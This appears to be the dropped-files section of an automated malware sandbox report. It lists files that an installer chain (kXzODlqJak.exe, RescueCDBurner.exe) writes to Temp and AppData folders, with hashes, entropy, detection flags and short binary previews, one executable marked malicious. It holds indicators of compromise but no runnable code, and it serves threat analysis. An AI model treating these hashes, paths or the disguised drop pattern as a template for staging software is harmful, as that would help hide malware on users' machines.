                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1053696
                                                                                                                                                                                                                                                                          Entropy (8bit):6.539052666912709
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12288:m+PpRNPe4+DZFvnwJ9o+Hllp59K03AskvvukLosiLHrv7F0YmIYunuGS:m+hRCZhwY+Hllp59OHvfo7HrCYmItnC
                                                                                                                                                                                                                                                                          MD5:8A2E025FD3DDD56C8E4F63416E46E2EC
                                                                                                                                                                                                                                                                          SHA1:5F58FEB11E84AA41D5548F5A30FC758221E9DD64
                                                                                                                                                                                                                                                                          SHA-256:52AE07D1D6A467283055A3512D655B6A43A42767024E57279784701206D97003
                                                                                                                                                                                                                                                                          SHA-512:8E3A449163E775DC000E9674BCA81FFABC7FECD9278DA5A40659620CFC9CC07F50CC29341E74176FE10717B2A12EA3D5148D1FFC906BC809B1CD5C8C59DE7BA1
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D.....u...u...u......u..>....u..>....u..>....u...t.".u.......u..>.._.u..>....u..>....u..>....u.Rich..u.........PE..L......Q...........!.....x...........J.............d..............U..........`......I.....@.........................P.......43..d............................ ..........................................@............................................text....v.......x.................. ..`.rdata..H>.......@...|..............@..@.data...8=..........................@....rsrc...............................@..@.reloc...9... ...:..................@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Remoteservicezoo_test\QtXml4.dll

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):356352
                                                                                                                                                                                                                                                                          Entropy (8bit):6.447802510709224
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6144:6gdDO1NTI8ew+Rh9CY8gjvXQ0AObEL9gqIL:6gda1FI8V+f9FFzA1IL
                                                                                                                                                                                                                                                                          MD5:E9A9411D6F4C71095C996A406C56129D
                                                                                                                                                                                                                                                                          SHA1:80B6EEFC488A1BF983919B440A83D3C02F0319DD
                                                                                                                                                                                                                                                                          SHA-256:C9B2A31BFE75D1B25EFCC44E1DF773AB62D6D5C85EC5D0BC2DFE64129F8EAB5E
                                                                                                                                                                                                                                                                          SHA-512:93BB3DD16DE56E8BED5AC8DA125681391C4E22F4941C538819AD4849913041F2E9BB807EB5570EE13DA167CFECD7A08D16AD133C244EB6D25F596073626CE8A2
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......GN.f./.5./.5./.5.W>5./.5.a55./.5..35./.5...5./.5..15./.5./.5...5...5./.5..65./.5..75./.5..05./.5Rich./.5........PE..L...Y..Q...........!.....v..........Z..............a..............U..................k....@..........................w..\...LL..d....0.......................@..hR..................................p...@...............p............................text....t.......v.................. ..`.rdata..............z..............@..@.data........ ......................@....rsrc........0......................@..@.reloc..la...@...b..................@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):6487736
                                                                                                                                                                                                                                                                          Entropy (8bit):7.518089126573906
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:98304:u4bRxuHuFP2rHLpHPA477yNRgoPbfnRROWR721LYfs17u0kcFrXLEJfwY:u4NxuOFI1AEyrbf/52BYfs1LkcFrXL+X
                                                                                                                                                                                                                                                                          MD5:11C8962675B6D535C018A63BE0821E4C
                                                                                                                                                                                                                                                                          SHA1:A150FA871E10919A1D626FFE37B1A400142F452B
                                                                                                                                                                                                                                                                          SHA-256:421E36788BFCB4433178C657D49AA711446B3A783F7697A4D7D402A503C1F273
                                                                                                                                                                                                                                                                          SHA-512:3973C23FC652E82F2415FF81F2756B55E46C6807CC4A8C37E5E31009CEC45AB47C5D4228C03B5E3A972CACD6547CF0D3273965F263B1B2D608AF89F5BE6E459A
                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2/m.vN..vN..vN......wN..m..pN..m..zN...6..wN..m..cN...6..aN..vN...J..m..xN..m..$N..m..wN..m..wN..RichvN..................PE..L......e.................(....Z......Y.......@....@..........................0c.......c...@..................................b_.h.....`.8.............b.. ....b.X...PT..............................x.^.@............@..l............................text...r&.......(.................. ..`.rdata....W..@....W..,..............@..@.data...xM...0`.."....`.............@....rsrc...8.....`......<`.............@..@.reloc........b.......a.............@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Remoteservicezoo_test\StarBurn.dll

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):664064
                                                                                                                                                                                                                                                                          Entropy (8bit):6.953961612144461
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12288:c/gzbnbASodCXNn5FJX5KLN9VmoBBDFyn/:kRSoSn5FJX5K59VmoDK
                                                                                                                                                                                                                                                                          MD5:A147F46E2E1F315AA219482D645BEED9
                                                                                                                                                                                                                                                                          SHA1:073A6AE153A903B31463FA33512AA93DA1E3BB6F
                                                                                                                                                                                                                                                                          SHA-256:2EB33D31364355ACBA660487F3747A9899DBDEB2221C58EB2BF916E53267DBC4
                                                                                                                                                                                                                                                                          SHA-512:690DD6A959C6043EFE48ECB840C6353B2CE5F95372933A7201959C5A2075657EE2B02921685EAF23AE0EC228ABD86AA24F7CB11A9F089EB49D20F6AB6C46E3B8
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......f.3 ".]s".]s".]s.R s#.]s.R0s#.]s..s .]s..s+.]s".\s..]s+..s9.]s+..s..]s+..sq.]s+..s#.]s+..s#.]s+..s#.]sRich".]s........................PE..L.....NK...........!.....R...................p.......................................J....@..........................*..C6......d................................B..@................................K..@...........X................................text...SP.......R.................. ..`.data...l|...p...T...V..............@....idata..............................@....rsrc...............................@..@.reloc...d.......d..................@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Remoteservicezoo_test\hypochondriac.xlsx

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):60283
                                                                                                                                                                                                                                                                          Entropy (8bit):4.569551839311306
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:1536:JLFhcTCRX7325Q72JnHi/KPHVzwrU60mYuBYdoQ:hIC173hknmqBrRmzB9Q
                                                                                                                                                                                                                                                                          MD5:3620E2D48EB60EC875FB9262ABC87D2B
                                                                                                                                                                                                                                                                          SHA1:55C7CE6E00901BE5090D7D1ACFF47D30436FA5EF
                                                                                                                                                                                                                                                                          SHA-256:E8E6F472277E0F3EE5B6640B0EC436029AF329E37F0C84978399DEB38768BEB1
                                                                                                                                                                                                                                                                          SHA-512:CBE8C6BE90FD75EE9D0A912E832ED784C4273B495EE1246B97601A6FA24FA4CE6FB07BE97508DA4FA249F05C96D5A86DA1805099C06EDD1CA81E726954025DD9
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:.M.kZ.u_aUO......KUF...ABb..F..u.]F.rV..f..t..qm.Z_C....a._rAHlPTAnm.XL...Bp\h.BD.nd..p.x..W.k..T]w.nn.l.xQ.NE.B.b.dF...K.V]j..Yr.A.t..O_mrdES_Ww.Wg.P.....vq.I.BT..f.Jm.xxf.....V.kU..HiyRuFEC`.....y...`cgmo.....Pk....UbG..GQ..N.o...wA^.A..K.J.Iv...xvp].Sh...Gh.F...OmAZdJ...c.....ftg...Bc....lKWOSh..[..j...h...Ra..If...oA.r.itG....x_m...K.........HV.mW.S..X.soGI[F.AavnVBbsd.W.hE..b^...kE.B.D.[.E......lsxC..rJUb.Ts.P....M.`[p...w.F...Mv...sJ.h.Gpc...PF.^.V^J..Q.j.JI.....r..aI.K.OSl..eU\vo.v...K.x..aR.h...h..R.N.sQ...Y.....K.B....VdiHm...s........_......w.^RY`.o`H.WT.sJ.is...]..^A]Z....k.KJ..s...p.F...l..........f.wq\g....MRl..a..o....cZ].`.D.w._g.g.X.b...WdC.GLeCj[.y...HR..mG.V.k...v..YA.KPhvtC..v.gpnBw..m....]..V.f...`..W..T.QnMk.sZ.We...u.^.h^....A.C....W.ww..H...y.m..Py..jV.rOgkpnaCm.....jZL..Xo...hS......Ao..e\^y]...PS.EMf.^k.Uu.TmO..\\WsQ.T..u.w.qAq`x\..m.S]Z.......po...^H\nphxx.y..Z.X.Zs........oO.r.m..vh.W.k....mBMw.JJ.hc...p].[........n..nI...R...MU.F.v.w......s..[C...LU...C..y.J

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Remoteservicezoo_test\msvcp100.dll

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):421200
                                                                                                                                                                                                                                                                          Entropy (8bit):6.59808962341698
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12288:iHEqYsrMWIqz473PTiPoH/aGhUgiW6QR7t5qv3Ooc8UHkC2eKq87:iH9YsIWIW4rPTiPofaDv3Ooc8UHkC2e8
                                                                                                                                                                                                                                                                          MD5:03E9314004F504A14A61C3D364B62F66
                                                                                                                                                                                                                                                                          SHA1:0AA3CAAC24FDF9D9D4C618E2BBF0A063036CD55D
                                                                                                                                                                                                                                                                          SHA-256:A3BA6421991241BEA9C8334B62C3088F8F131AB906C3CC52113945D05016A35F
                                                                                                                                                                                                                                                                          SHA-512:2FCFF4439D2759D93C57D49B24F28AE89B7698E284E76AC65FE2B50BDEFC23A8CC3C83891D671DE4E4C0F036CEF810856DE79AC2B028AA89A895BF35ABFF8C8D
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........._d..17..17..17...7..17..7..17..07 .17(..7..17..7..17..7..17..7..17..7..17..7..17..7..17..7..17Rich..17........................PE..L.....K.........."!.................<.............x......................................@.................................`...<.... ...............V..P....0..H;..p................................/..@...............p............................text............................... ..`.data...$:.......,..................@....rsrc........ ......................@..@.reloc...S...0...T..................@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Remoteservicezoo_test\msvcr100.dll

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):770384
                                                                                                                                                                                                                                                                          Entropy (8bit):6.908020029901359
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12288:fQmCy3NeRjkpQmj3oaMtQqjoygfXq3kon9IlbgaOxQdVJJ6j5EBKX8hR5:ImCy3VQs9MtLjTgfa3kon9FaOdEz5
                                                                                                                                                                                                                                                                          MD5:67EC459E42D3081DD8FD34356F7CAFC1
                                                                                                                                                                                                                                                                          SHA1:1738050616169D5B17B5ADAC3FF0370B8C642734
                                                                                                                                                                                                                                                                          SHA-256:1221A09484964A6F38AF5E34EE292B9AFEFCCB3DC6E55435FD3AAF7C235D9067
                                                                                                                                                                                                                                                                          SHA-512:9ED1C106DF217E0B4E4FBD1F4275486CEBA1D8A225D6C7E47B854B0B5E6158135B81BE926F51DB0AD5C624F9BD1D09282332CF064680DC9F7D287073B9686D33
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ R.HA<.HA<.HA<.A9..KA<.HA=..A<.'7..@<.'7...A<.'7..|A<.'7...A<.'7..IA<.'7..IA<.'7..IA<.RichHA<.........PE..L.....K.........."!................. ....... .....x.................................S....@..........................I......D...(.......................P....... L..h...8...........................pE..@............................................text............................... ..`.data...|Z... ...N..................@....rsrc................X..............@..@.reloc.. L.......N...\..............@..B........................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Remoteservicezoo_test\wiggery.bmp

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):4485813
                                                                                                                                                                                                                                                                          Entropy (8bit):7.960501110953352
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:98304:zvf5BQTYhbOg6IdJogvR31mRCbJ2O4qm08UhFdFtZ7C5Bd6wKWgSKNKk8R:zvhy2cW31mRCbEqf8UhFiBdQ+kO
                                                                                                                                                                                                                                                                          MD5:B56FE6EA5F9CAFB0C73A95A3377C8CA1
                                                                                                                                                                                                                                                                          SHA1:252F48E39D28A5554152F32F23A406E4E9E752DD
                                                                                                                                                                                                                                                                          SHA-256:04C5B808B740AC5F17B12956AD0D1B2C21EA1D6A6011275AC2A0D08B454EDB6A
                                                                                                                                                                                                                                                                          SHA-512:1A094CD5029F1D2BD0E804EC7F1911CF25CE319BEF3EB03BC57DF09A5BCF5957C813F9F7FF57B936F0596E0E00F3B447E2E2C3B5BAE9F3AD99BEB63C441DC0D7
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:.b...C.y.y.m..L......\^..n.N.HQ..n.Eh.....l..q.JY.kE....peI.k.c..mE..c.Lr\p...ZTW.X.qo.s.x..HHb.f.aq..s.\E^^mYoR_Cb...].xBM.xR.[.kpg.MGx_.x.Xkx..._...jilM.[.CAm....tV...wtM...ywlI..yU.S.WQHig..w.].Sx_QX]...LLL_sC.P.y.pj.TgH.C..dOC.RqnoF....Qv.....b.m..M.]X.L.hvbeZ..f.ma....tNrr.Cbe..S..Yvnjbh...C..mqWsjglcP.W.Mu.TIq..fYcf.K..WbMIp...IRn[.G..Y..V.._..]..L].U...L]O..L.uHt`.._VBuVd.hK.DhxRlwPY[...xo....F^SLA.....[gXWLVF.......wX.w.b...nlUr.E.D...UN.f..JM.f.T.CF.....yO.RmS]..d.^e...O..b.^\K^.......kc[U...yfym...Vc..a.oUd.rD.kDWFLcL.UIZM.cfQK.e^..hvr.oxq.FI..QNP...LQT..q...h..i_.hA.mu.d......HKg.UK...tL...x...q^...h.._.q.LT.g.t]do.BM.S.HKj[..q..R.[O^.E.IV.v..hfA.mh..^N..h.......Th..shY...xLOtm\Jl.\fZ..g.b.b.`....A.ao.f..^.y...of...B..y....R..W.P..nYuE..F.X...Wv.V..\^.rR.^..X....]gxml.ukp.Vc.f.F..A...K....Pix.IObhW_^C...^.....A.y..QUH.vg.W\o..hZ......MM....gK..L..m...E..T.O.i....pNt.Y..J...tD.n_...]JEfbw.p...f.^^.I..Y..L..QJb.M.i.H..........q..u..W^...Kv.T.y..fCeqB.l......bDm...._xd.].p.l..U

                                                                                                                                                                                                                                                                          C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\Ascidian.dll

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):474056
                                                                                                                                                                                                                                                                          Entropy (8bit):6.5454050911466695
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12288:ljzSlYxJd1mGgLzDxlzLIQNO1fc2G0LqR6tA15/5K+su:BzMz/VNUch0LqR6850lu
                                                                                                                                                                                                                                                                          MD5:494C74C13C1E2E81E77240CC64F09206
                                                                                                                                                                                                                                                                          SHA1:19C172D3B470F199EA50F7E71104CF30C538F351
                                                                                                                                                                                                                                                                          SHA-256:DD8FA081CA5F7238C755C9D6E42F5A8ACA6F90B10412D4092EDA1DE6F76D8FF7
                                                                                                                                                                                                                                                                          SHA-512:D76FA86BA474935809A057082E0C41C3CC7008477D0D8A035C4E77245BEBD9051B329BC07FD44FEC0FCF18B0C0779D60A497B36818C4A9815D7942DF8BE71672
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............P..P..P...P..P.F"P..P.F.PC.P.?P..P..P2.P./P..P.F.P..P.F'P..P.F&P..P.F!P..PRich..P........................PE..L......`...........!................k.............DZ.........................`.......q....@..........................-..................,E...............)......(P...................................w..@............................................text............................... ..`.rdata........... ..................@..@.data....a...0...>..................@....rsrc...,E.......F...\..............@..@.reloc...n.......p..................@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\BootstrapperApplicationData.xml

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exe
                                                                                                                                                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (450), with CRLF line terminators
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):2384
                                                                                                                                                                                                                                                                          Entropy (8bit):3.7598071625620997
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:48:y+03N6hOOvpEkwcne1LaJVc0wkycmeRPwJvgkWHmi1qrBZi1Hymrcl:Rwcn6Lwc0wkyc/Puvgk/WqrBZWSmrq
                                                                                                                                                                                                                                                                          MD5:31320EA56CB0843809C37D1C6F0D6AF1
                                                                                                                                                                                                                                                                          SHA1:53176DCF526AFADC71815A2A8404AFEC35C5452C
                                                                                                                                                                                                                                                                          SHA-256:470FF6E6A66EDCA04C8E9525B22B2B8E8F94C7CDB814EA2CCDB037E276B2F6D8
                                                                                                                                                                                                                                                                          SHA-512:75C0C4F7CC2A5E1424CFE3970F0DEC1394E21EC316D247ED0B78DAC8E03FABE46E290692B70C7707F85AA63F6F2DD75C0302237D8A5677E2A753AA60465D38E2
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.B.o.o.t.s.t.r.a.p.p.e.r.A.p.p.l.i.c.a.t.i.o.n.D.a.t.a. .x.m.l.n.s.=.".h.t.t.p.:././.w.i.x.t.o.o.l.s.e.t...o.r.g./.s.c.h.e.m.a.s./.v.4./.B.o.o.t.s.t.r.a.p.p.e.r.A.p.p.l.i.c.a.t.i.o.n.D.a.t.a.".>..... . .<.W.i.x.B.u.n.d.l.e.P.r.o.p.e.r.t.i.e.s. .D.i.s.p.l.a.y.N.a.m.e.=.".R.u.b.r.i.c.i.a.n.". .L.o.g.P.a.t.h.V.a.r.i.a.b.l.e.=.".W.i.x.B.u.n.d.l.e.L.o.g.". .C.o.m.p.r.e.s.s.e.d.=.".n.o.". .I.d.=.".{.7.3.F.A.9.7.B.8.-.5.F.C.7.-.4.3.D.A.-.9.8.3.E.-.7.E.C.4.0.2.A.0.4.6.D.6.}.". .U.p.g.r.a.d.e.C.o.d.e.=.".{.0.8.6.0.9.1.1.9.-.8.A.3.0.-.4.1.2.6.-.9.3.3.A.-.7.6.D.5.0.C.9.A.E.8.3.7.}.". .P.e.r.M.a.c.h.i.n.e.=.".y.e.s.". ./.>..... . .<.W.i.x.R.o.l.l.b.a.c.k.B.o.u.n.d.a.r.y. .I.d.=.".W.i.x.D.e.f.a.u.l.t.B.o.u.n.d.a.r.y.". .V.i.t.a.l.=.".y.e.s.". .T.r.a.n.s.a.c.t.i.o.n.=.".n.o.". ./.>..... . .<.W.i.x.P.a.c.k.a.g.e.P.r.o.p.e.r.t.i.e.s. .P.a.c.k.a.g.e.=.".P.a.x.w.a.x.". .V.i.t.a.l.=.".y.e.s.". .D.i.s.p.l.a.y.N.a.m.e.=.".

                                                                                                                                                                                                                                                                          C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\BundleExtensionData.xml

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exe
                                                                                                                                                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):252
                                                                                                                                                                                                                                                                          Entropy (8bit):3.50802487441866
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:QFulcLk0YR5Ie8GcUlLulFwENeWlYmH1fMWGVUlLulFwEnk:QF/LXYRWe8OLqF3Ye1kWGaLqFhk
                                                                                                                                                                                                                                                                          MD5:A35990570AFAA7D023FD2EBBE229AFB8
                                                                                                                                                                                                                                                                          SHA1:86688B13D3364ADB90BBA552F544D4D546AFD63D
                                                                                                                                                                                                                                                                          SHA-256:9B696AD0EC3B37BAC11DA76BCD51AD907D31EE9638DAD7BB8FDD5AEF919EF621
                                                                                                                                                                                                                                                                          SHA-512:1845B25697FED6D694428F53B2D1B2ABF1ACF8A09E8E49A536759822AD5B1A75D51BC7AE4D73E435B7BBC23AC34C9AED76F17414D218B54DA546C908F9A5182C
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.B.u.n.d.l.e.E.x.t.e.n.s.i.o.n.D.a.t.a. .x.m.l.n.s.=.".h.t.t.p.:././.w.i.x.t.o.o.l.s.e.t...o.r.g./.s.c.h.e.m.a.s./.v.4./.B.u.n.d.l.e.E.x.t.e.n.s.i.o.n.D.a.t.a.". ./.>.

                                                                                                                                                                                                                                                                          C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\QtCore4.dll

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):2598912
                                                                                                                                                                                                                                                                          Entropy (8bit):6.6049974235008655
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:49152:VTFgiFpGXOENKSgjGkJsv6tWKFdu9C6TELyvL/6mShMZtmjNUVrciV5P+7QVg07/:V+iDaWjxJsv6tWKFdu9CZgfQ
                                                                                                                                                                                                                                                                          MD5:FECC62A37D37D9759E6B02041728AA23
                                                                                                                                                                                                                                                                          SHA1:0C5F646CAEF7A6E9073D58ED698F6CFBFB2883A3
                                                                                                                                                                                                                                                                          SHA-256:94C1395153D7758900979351E633AB68D22AE9B306EF8E253B712A1AAB54C805
                                                                                                                                                                                                                                                                          SHA-512:698F90F1248DACBD4BDC49045A4E80972783D9DCEC120D187ABD08F5EF03224B511F7870320938B7E8BE049C243FFB1C450C847429434EF2E2C09288CB9286A6
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............,..,..,J.,,..,.<*,..,.<(,..,..7,..,..',..,..,..,.<.,...,.<.,...,.</,..,.<.,..,.<),..,Rich..,........................PE..L...T..Q...........!................B..............g..............U...........'......;(...@...........................!.<x..<.!.......&.......................&....................................... .@...............(............................text.............................. ..`.rdata..<...........................@..@.data....2...p&..*...Z&.............@....rsrc.........&.......&.............@..@.reloc........&.......&.............@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\QtGui4.dll

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):8581632
                                                                                                                                                                                                                                                                          Entropy (8bit):6.736578346160889
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:98304:YxRJATZlLne1/cF6ZWHxD1HFH+J+70msIWeiLtRgi3d4PJpTcSqxyr:YxiZBG2xpljTcJy
                                                                                                                                                                                                                                                                          MD5:831BA3A8C9D9916BDF82E07A3E8338CC
                                                                                                                                                                                                                                                                          SHA1:6C89FD258937427D14D5042736FDFCCD0049F042
                                                                                                                                                                                                                                                                          SHA-256:D2C8C8B6CC783E4C00A5EF3365457D776DFC1205A346B676915E39D434F5A52D
                                                                                                                                                                                                                                                                          SHA-512:BEDA57851E0E3781ECE1D0EE53A3F86C52BA99CB045943227B6C8FC1848A452269F2768BF4C661E27DDFBE436DF82CFD1DE54706D814F81797A13FEFEC4602C5
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......0...t...t...t......p.....u...oq.|...}...q...oq.r...}..c...t.~.....oq.i...oq.....oq.u...oq.u...oq.u...Richt...........PE..L......Q...........!......Y...).....2.S.......Y....e..............U..........P............@...........................m..c...Ul.,.....{.......................{..O..................................x'e.@.............Y..............................text...K.Y.......Y................. ..`.rdata....!...Y...!...Y.............@..@.data...t.....z.......z.............@....rsrc.........{......r{.............@..@.reloc...y....{..z...x{.............@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\QtNetwork4.dll

                                                                                                                                                                                                                                                                          Download File
